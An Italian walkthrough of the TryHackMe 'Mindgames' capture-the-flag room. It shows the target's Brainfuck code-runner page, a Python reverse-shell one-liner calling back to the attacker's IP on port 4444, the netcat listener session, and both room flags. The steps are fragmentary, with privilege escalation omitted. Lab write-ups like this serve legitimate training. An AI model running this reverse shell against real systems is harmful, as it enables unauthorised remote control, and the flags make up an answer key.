Descrizione:
Solo una pessima idea...
Nessun avviso. Attaccalo. Non mollare se rimani bloccato, enumera di più
Link: https://tryhackme.com/room/mindgames
Iniziamo enumerando i servizi con Nmap:
user㉿parrot:/data/Mindgames$ curl -s http://10.10.211.54
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Mindgames.</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" type="text/css" media="screen" href="/main.css">
<script src="/main.js"></script>
</head>
<body onload="onLoad()">
<h1>Sometimes, people have bad ideas.</h1>
<h1>Sometimes those bad ideas get turned into a CTF box.</h1>
<h1>I'm so sorry.</h1> <!-- That's a lie, I enjoyed making this. -->
<p>Ever thought that programming was a little too easy? Well, I have just the product for you. Look at the example code below, then give it a go yourself!</p>
<p>Like it? Purchase a license today for the low, low price of 0.009BTC/yr!</p>
<h2>Hello, World</h2>
<pre><code>+[------->++<]>++.++.---------.+++++.++++++.+[--->+<]>+.------.++[->++<]>.-[->+++++<]>++.+++++++..+++.[->+++++<]>+.------------.---[->+++<]>.-[--->+<]>---.+++.------.--------.-[--->+<]>+.+++++++.>++++++++++.</code></pre>
<h2>Fibonacci</h2>
<pre><code>--[----->+<]>--.+.+.[--->+<]>--.+++[->++<]>.[-->+<]>+++++.[--->++<]>--.++[++>---<]>+.-[-->+++<]>--.>++++++++++.[->+++<]>++....-[--->++<]>-.---.[--->+<]>--.+[----->+<]>+.-[->+++++<]>-.--[->++<]>.+.+[-->+<]>+.[-->+++<]>+.+++++++++.>++++++++++.[->+++<]>++........---[----->++<]>.-------------.[--->+<]>---.+.---.----.-[->+++++<]>-.[-->+++<]>+.>++++++++++.[->+++<]>++....---[----->++<]>.-------------.[--->+<]>---.+.---.----.-[->+++++<]>-.+++[->++<]>.[-->+<]>+++++.[--->++<]>--.[----->++<]>+.++++.--------.++.-[--->+++++<]>.[-->+<]>+++++.[--->++<]>--.[----->++<]>+.+++++.---------.>++++++++++...[--->+++++<]>.+++++++++.+++.[-->+++++<]>+++.-[--->++<]>-.[--->+<]>---.-[--->++<]>-.+++++.-[->+++++<]>-.---[----->++<]>.+++[->+++<]>++.+++++++++++++.-------.--.--[->+++<]>-.+++++++++.-.-------.-[-->+++<]>--.>++++++++++.[->+++<]>++....[-->+++++++<]>.++.---------.+++++.++++++.+[--->+<]>+.-----[->++<]>.[-->+<]>+++++.-----[->+++<]>.[----->++<]>-..>++++++++++.</code></pre>
<h2>Try before you buy.</h2>
<form id="codeForm">
<textarea id="code" placeholder="Enter your code here..."></textarea><br>
<button>Run it!</button>
</form>
<p></p>
<label for="outputBox">Program Output:</label>
<pre id="outputBox"></pre>
</body>
</html>
Intercettare le richieste con Burp Suite rivelerà che il form invia l'input del form alla posizione /api/bf, in modo asincrono, grazie a javascript (main.js):
async function postData(url = "", data = "") {
// Default options are marked with *
const response = await fetch(url, {
method: 'POST', // *GET, POST, PUT, DELETE, etc.
cache: 'no-cache', // *default, no-cache, reload, force-cache, only-if-cached
credentials: 'same-origin', // include, *same-origin, omit
headers: {
'Content-Type': 'text/plain'
},
redirect: 'follow', // manual, *follow, error
referrerPolicy: 'no-referrer', // no-referrer, *client
body: data // body data type must match "Content-Type" header
});
return response; // We don't always want JSON back
}
function onLoad() {
document.querySelector("#codeForm").addEventListener("submit", function (event) {
event.preventDefault()
runCode()
});
}
async function runCode() {
const programBox = document.querySelector("#code")
const outBox = document.querySelector("#outputBox")
outBox.textContent = await (await postData("/api/bf", programBox.value)).text()
Reverse shell
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.50.72",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);
user㉿parrot:/data/Mindgames$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.211.54] 38032
bash: cannot set terminal process group (677): Inappropriate ioctl for device
bash: no job control in this shell
mindgames@mindgames:~/webserver$ id
id
uid=1001(mindgames) gid=1001(mindgames) groups=1001(mindgames)
mindgames@mindgames:~/webserver$
USER FLAG:
mindgames@mindgames:~/webserver$ cd /home
cd /home
mindgames@mindgames:/home$ ls -l
ls -l
total 8
drwxr-xr-x 6 mindgames mindgames 4096 May 11 15:36 mindgames
drwxr-x--- 5 tryhackme tryhackme 4096 May 11 15:25 tryhackme
mindgames@mindgames:/home$ cd mindgames
cd mindgames
mindgames@mindgames:~$ ls -la
ls -la
total 40
drwxr-xr-x 6 mindgames mindgames 4096 May 11 15:36 .
drwxr-xr-x 4 root root 4096 May 11 13:48 ..
lrwxrwxrwx 1 mindgames mindgames 9 May 11 15:25 .bash_history -> /dev/null
-rw-r--r-- 1 mindgames mindgames 220 May 11 13:48 .bash_logout
-rw-r--r-- 1 mindgames mindgames 3771 May 11 13:48 .bashrc
drwx------ 2 mindgames mindgames 4096 May 11 14:07 .cache
drwx------ 3 mindgames mindgames 4096 May 11 14:07 .gnupg
drwxrwxr-x 3 mindgames mindgames 4096 May 11 15:24 .local
-rw-r--r-- 1 mindgames mindgames 807 May 11 13:48 .profile
-rw-rw-r-- 1 mindgames mindgames 38 May 11 15:24 user.txt
drwxrwxr-x 3 mindgames mindgames 4096 May 11 15:36 webserver
mindgames@mindgames:~$ cat user.txt
cat user.txt
thm{411f7d38247ff441ce4e134b459b6268}
ROOT FLAG:
mindgames@mindgames:/etc/systemd/system/multi-user.target.wants$ cat server.service
[Unit]
Description=Production Web Server
[Service]
User=mindgames
Group=mindgames
WorkingDirectory=/home/mindgames/webserver
ExecStart=/home/mindgames/webserver/server -p 80
Restart=always
RestartSec=5
[Install]
WantedBy=multi-user.target
mindgames@mindgames:/etc/systemd/system/multi-user.target.wants$ ls -la server.service
lrwxrwxrwx 1 root root 34 May 11 15:33 server.service -> /etc/systemd/system/server.service
Infine:
root@mindgames:~# cat /root/root.txt
thm{1974a617cc84c5b51411c283544ee254}
RICAPITOLANDO:
User flag.
thm{411f7d38247ff441ce4e134b459b6268}
Root flag.
thm{1974a617cc84c5b51411c283544ee254}